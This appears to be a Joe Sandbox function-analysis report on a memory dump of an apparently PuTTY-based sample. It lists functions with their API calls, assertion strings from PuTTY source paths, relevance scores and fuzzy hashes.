Opcode Fuzzy Hash: a7b10816a810ab38b33e19babbf8e5400d3dee2afdfc07684b56076f369a50c8
Instruction Fuzzy Hash: 7F1187B69452046BD714EF14AC82A7F77E4AF95748F0D442CFD8D97302FA31EA0896A3

Uniqueness

Uniqueness Score: -1.00%

Function 00CDEC1A Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CDEC26
IsDebuggerPresent.KERNEL32 ref: 00CDECF2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CDED12
UnhandledExceptionFilter.KERNEL32(?), ref: 00CDED1C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bbf94f74830b49ae0b3e79545bc730276c4c031430a9ddd258ff808cc56920d8
Instruction ID: a35b5dde1cff448150bd19d0b7a3f2d2b6a6113a2f7033053d9ebe7c28b867b0
Opcode Fuzzy Hash: bbf94f74830b49ae0b3e79545bc730276c4c031430a9ddd258ff808cc56920d8
Instruction Fuzzy Hash: 00311675D4531C9BDB20EFA4D989BCDBBB8BF08300F1041AAE50DAB250EB719B849F55

Uniqueness

Uniqueness Score: -1.00%

Function 00C69D00 Relevance: 5.6, Strings: 4, Instructions: 594COMMON

Download Yara Rule

Strings

(IPv6), xrefs: 00C69DF0
(IPv4), xrefs: 00C69E00, 00C69E08
Looking up host "%s"%s, xrefs: 00C69E0A
;, xrefs: 00C69FC2

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: (IPv4)$ (IPv6)$;$Looking up host "%s"%s
API String ID: 0-1440922583
Opcode ID: 1ea46e8ba39ec3f3e0f27a32ba7da2dbcc6c62c5b599cf920f0cc5cbf7f20cfe
Instruction ID: 39e9bc7f3ad1f22822be5d528111eb694189bd9f214b3fe73e5e6891f5609539
Opcode Fuzzy Hash: 1ea46e8ba39ec3f3e0f27a32ba7da2dbcc6c62c5b599cf920f0cc5cbf7f20cfe
Instruction Fuzzy Hash: 87228370604340AFD720DF68CC89F17BBA9EF99708F04486CF5898B382D676E955CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00C63130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,000000B1,?,?), ref: 00C631BA

Strings

c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00C6319B
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C63196

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
API String ID: 3015471070-4089354181
Opcode ID: 8332437085ba417eb86e1d5ae90911b564e7ff0d0ab1c553609de16b7892eeb0
Instruction ID: 0a43cbcebce4ff7109c4b61bf233caef82293a5d73241ba715ce00e8d7982300
Opcode Fuzzy Hash: 8332437085ba417eb86e1d5ae90911b564e7ff0d0ab1c553609de16b7892eeb0
Instruction Fuzzy Hash: 0A11A972A44349EFD220DE04DCC1A2AF3A8FB4A308F010525F994A3252E371AE14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetVersionExA), ref: 00C7CE46

Strings

kernel32.dll, xrefs: 00C7CE2A
GetVersionExA, xrefs: 00C7CE40

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc
String ID: GetVersionExA$kernel32.dll
API String ID: 190572456-3521452493
Opcode ID: 76b29072d92579f6db48df90ff73abf7644a1012e4fc038b81349b60398b9384
Instruction ID: ef774453d608712198a72fa818d4c4dc68392fc636154d5c0a32b8b0888b519c
Opcode Fuzzy Hash: 76b29072d92579f6db48df90ff73abf7644a1012e4fc038b81349b60398b9384
Instruction Fuzzy Hash: 4E118EB49043129BD3209F3CFD8AB157BE4A706710F00852DE469CB3E6DB749A44DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C73470 Relevance: 5.2, Strings: 4, Instructions: 230COMMON

Download Yara Rule

Strings

mapping[i].v < 32, xrefs: 00C73601
mapping[i].v >= 0, xrefs: 00C7367A
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/settings.c, xrefs: 00C735FC, 00C73675, 00C736B3
j < n, xrefs: 00C736B8

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/settings.c$j < n$mapping[i].v < 32$mapping[i].v >= 0
API String ID: 4218353326-2506927750
Opcode ID: 8fa350484add2b812722e894bcb91a83c700b0fd95912dba5377acd9c4c24b1a
Instruction ID: 59e23146f185284301798db4c8e068dbeb84902bcad6b1bd52e99051b14cd23c
Opcode Fuzzy Hash: 8fa350484add2b812722e894bcb91a83c700b0fd95912dba5377acd9c4c24b1a
Instruction Fuzzy Hash: 8E71C072908384AFC711AE15C88196ABBA1BB99314F15C92CF9AD57341E331EF05AB93

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE360 Relevance: 5.2, Strings: 3, Instructions: 1437COMMON

Download Yara Rule

Strings

!mp_eq_integer(d, 0), xrefs: 00CAE3F2
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c, xrefs: 00CAE3ED, 00CAE670, 00CAE915, 00CAEA25, 00CAEA7E, 00CAEACB, 00CAEB5F, 00CAEDD9, 00CAEE54, 00CAEEFA, 00CAF2C6
!mp_cmp_hs(remainder, d), xrefs: 00CAF2CB

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: !mp_cmp_hs(remainder, d)$!mp_eq_integer(d, 0)$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c
API String ID: 0-1052706801
Opcode ID: a59f02e01b800772d9d6bbc65649e21e963018ca5ca748e8418d550af482e7b0
Instruction ID: 3a3402c376a449ad6a173de78de6a292b06fdedb80c4b6796b2e93f9f8ec2c5c
Opcode Fuzzy Hash: a59f02e01b800772d9d6bbc65649e21e963018ca5ca748e8418d550af482e7b0
Instruction Fuzzy Hash: BBB2AD76A043129FD714DE68C88171AB7E2EFC9308F0A853CE9999B351EA75ED05CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD6C0 Relevance: 4.8, Strings: 3, Instructions: 1089COMMON

Download Yara Rule

Strings

word < x->nw, xrefs: 00CADAFE, 00CADB45
x0->nw == x1->nw, xrefs: 00CAD9BE, 00CADF9A, 00CADFFD
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c, xrefs: 00CAD7D2, 00CAD811, 00CAD88E, 00CAD9B9, 00CADAF9, 00CADB40, 00CADF95, 00CADFF8

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c$word < x->nw$x0->nw == x1->nw
API String ID: 0-3337915902
Opcode ID: 6bf28333de4480571558d426680688083a49bc15b68df0c08582b0d3c4b24f0e
Instruction ID: e3973070542d8f042dd497b80b47654be77bf245c692712d8be048d947597d0a
Opcode Fuzzy Hash: 6bf28333de4480571558d426680688083a49bc15b68df0c08582b0d3c4b24f0e
Instruction Fuzzy Hash: 6182A075A042129FC710DF18C881A2AB7E2FF9A308F19856CE95A9B351E731FD11DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CB00 Relevance: 4.8, APIs: 3, Instructions: 259COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C7CB5B
_strlen.LIBCMT ref: 00C7CB76
_strlen.LIBCMT ref: 00C7CB90

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 1db710a694b46b0633989749297568f5ab0de3c5dada2a083acd29d7c64b755c
Instruction ID: f12c5400e7da1da14df27a52124b86f113d3250688192887c5ec195582406407
Opcode Fuzzy Hash: 1db710a694b46b0633989749297568f5ab0de3c5dada2a083acd29d7c64b755c
Instruction Fuzzy Hash: D6715A729043465BDB305E289CC176A7BE1AF92304F09C52DFCED9B3C2E2329E459782

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8C6C Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00CF3742: GetLastError.KERNEL32(?,?,00CE60D8,?,?,?,?,00CEE2B7,00CEE284,?,?,?,?,?,00CEE284,?), ref: 00CF3746
Part of subcall function 00CF3742: SetLastError.KERNEL32(00000000,00CEE284,?,?,?,?,?,00CEE284,?,00000000,?,00000003,00CE1B8B), ref: 00CF37E8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF8CC0
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF8D0A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF8DD0

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 46c510cf261dbcfdc423ac1cf3b89232feb346dcad1058a4fc3d9c0cbc0a14ea
Instruction ID: 185d9017fc5243e02b50b39b7eab4815bb777fc8aa6f00bf9e2bca6bdb13e400
Opcode Fuzzy Hash: 46c510cf261dbcfdc423ac1cf3b89232feb346dcad1058a4fc3d9c0cbc0a14ea
Instruction Fuzzy Hash: A661D47560021B9FDBA8DF24CC86BBA77A8FF14700F10407AEE15C6285EB74DA48DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CF482D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CF4925
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CF492F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CF493C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 738ffaafece95ce08cd85ec8cc086fa0696de677480e2df6d3784358bb3ff781
Instruction ID: a236451ba0c482fe6c24070bc9e5e3bb8c94a908dbb9a7a4a8ccdb4f0c1b3c9b
Opcode Fuzzy Hash: 738ffaafece95ce08cd85ec8cc086fa0696de677480e2df6d3784358bb3ff781
Instruction Fuzzy Hash: D131D27490122DABCB21DF64DD88B9DBBB8BF08310F5041EAE91CA7290E7709F818F55

Uniqueness

Uniqueness Score: -1.00%

Function 00C48280 Relevance: 4.6, APIs: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C78960: _strlen.LIBCMT ref: 00C78970

IsIconic.USER32 ref: 00C482D7
SetWindowTextW.USER32(00000000,?), ref: 00C482F7
SetWindowTextA.USER32(00000000,00000000), ref: 00C48315

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: TextWindow$Iconic_strlen
String ID:
API String ID: 1204891203-0
Opcode ID: c04470c7487373bdcffa5545d5b8915d7f8b2c3e82e419c95944a01d7ef04692
Instruction ID: c81de82377368908ee6ccacce86d7856a1d88e8033681e0213a2467165866ac6
Opcode Fuzzy Hash: c04470c7487373bdcffa5545d5b8915d7f8b2c3e82e419c95944a01d7ef04692
Instruction Fuzzy Hash: 5601FCBD900310ABEB116F20BC46F3A3B65FB51754F080424FA18D63B2EB725958EBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00C48330 Relevance: 4.6, APIs: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C78960: _strlen.LIBCMT ref: 00C78970

IsIconic.USER32 ref: 00C48387
SetWindowTextW.USER32(00000000,?), ref: 00C483A7
SetWindowTextA.USER32(00000000,00000000), ref: 00C483C5

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: TextWindow$Iconic_strlen
String ID:
API String ID: 1204891203-0
Opcode ID: ba9ea55208daf7b66fc8a1eeaee79096e14feaaaf14cc9641157f6aeb4bb9c39
Instruction ID: 67b099e0f7fb7180993a074d94dd5c1c43fd6ed34f204fea42f6c40e69579273
Opcode Fuzzy Hash: ba9ea55208daf7b66fc8a1eeaee79096e14feaaaf14cc9641157f6aeb4bb9c39
Instruction Fuzzy Hash: 4D01D8BD944300ABEB112F20FC46F3A3B65EB41714F040024FA09D63B2EB725958EBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C52080 Relevance: 4.3, Strings: 3, Instructions: 575COMMON

Download Yara Rule

Strings

chars != NULL, xrefs: 00C521A5
nchars_used < nchars_got, xrefs: 00C521C0
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/terminal.c, xrefs: 00C521A0, 00C521BB

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/terminal.c$chars != NULL$nchars_used < nchars_got
API String ID: 0-2237536808
Opcode ID: 49d61d313af4e7b16c61667d7fe9cd02af5cedae5a1ff77e1615c5e352c280d8
Instruction ID: a0f8f4345e69d4251c7bb07fed5c5b7b78993ef9fd08c6e9eab53b58cb484522
Opcode Fuzzy Hash: 49d61d313af4e7b16c61667d7fe9cd02af5cedae5a1ff77e1615c5e352c280d8
Instruction Fuzzy Hash: 4A2238785047408FD724CF34D88576BBBE1AF92319F14482DE8AA87291E771EACDCB46

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB180 Relevance: 4.3, Strings: 3, Instructions: 512COMMON

Download Yara Rule

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c, xrefs: 00CAB1CC, 00CAB364, 00CAB4FA, 00CAB536, 00CAB646
scratch.nw >= mp_mul_scratchspace_unary(inlen), xrefs: 00CAB1D1
len <= pool->nw, xrefs: 00CAB369, 00CAB4FF, 00CAB53B, 00CAB64B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c$len <= pool->nw$scratch.nw >= mp_mul_scratchspace_unary(inlen)
API String ID: 0-3569489099
Opcode ID: 4c23ebff1b35f2ff84ba9799db6a2fb7ece857ba76a851eab2b7dca6cf6b0aa7
Instruction ID: 775343f8a4c0d3c5853f363253feef5b137fd57b225dec6ac5eb013b8893146f
Opcode Fuzzy Hash: 4c23ebff1b35f2ff84ba9799db6a2fb7ece857ba76a851eab2b7dca6cf6b0aa7
Instruction Fuzzy Hash: 2D127D71B083069FC724DF69C490A6AB7E1BF89308F15893DE59AC7342E771AD05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C57150 Relevance: 3.9, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

col >= 0 && col < line->cols, xrefs: 00C57179, 00C5720E
tmpsize <= INT_MAX, xrefs: 00C572B7
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/terminal.c, xrefs: 00C57174, 00C57209, 00C572B2

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/terminal.c$col >= 0 && col < line->cols$tmpsize <= INT_MAX
API String ID: 0-2976084033
Opcode ID: ff195ea5fcdb5d20092a2cbda0b839e4b4169ca44b2f13ea90175b1aaaf45e7e
Instruction ID: dbb0233bc33c1679fa7118d0bce34b75cc041ca58bec84d8982c3187a923523e
Opcode Fuzzy Hash: ff195ea5fcdb5d20092a2cbda0b839e4b4169ca44b2f13ea90175b1aaaf45e7e
Instruction Fuzzy Hash: C851AC79A047059FC734CF18E841B26B7E2BFD0700F098A2CE9564B761EB70F989CA95

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6140 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1eddb525675a39cb7c4195ab0fb49fecfda28f331e27280ad53691b7a3530f
Instruction ID: b22a4ee1fd8399cec913a3522219720e8f568372d5aa696993c6238b8d031514
Opcode Fuzzy Hash: 8f1eddb525675a39cb7c4195ab0fb49fecfda28f331e27280ad53691b7a3530f
Instruction Fuzzy Hash: EEF16071E112599FDF14CFA9C8806ADF7B1FF98364F158269E925A7394D730AE01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00C41B3F Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000014), ref: 00C41B56

Part of subcall function 00C49B00: SetCaretPos.USER32(FFFFFFFF,FFFFFFFF), ref: 00C49B32
Part of subcall function 00C49B00: ImmGetContext.IMM32 ref: 00C49B55
Part of subcall function 00C49B00: ImmSetCompositionWindow.IMM32(00000000), ref: 00C49B79
Part of subcall function 00C49B00: ImmReleaseContext.IMM32(00000000,00000000), ref: 00C49B85

DefWindowProcW.USER32(?,?,?,?), ref: 00C43520

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ContextWindow$CaretCompositionInfoLocaleProcRelease
String ID:
API String ID: 2999936390-0
Opcode ID: 0198e63873c797c1269e97769299ff3d324a288c738ae315e341af0a2cc4ea43
Instruction ID: e67e6182eaa3a4e47a09d485195da202d90d5b49f5b7b6e6e1cac5b994c7573d
Opcode Fuzzy Hash: 0198e63873c797c1269e97769299ff3d324a288c738ae315e341af0a2cc4ea43
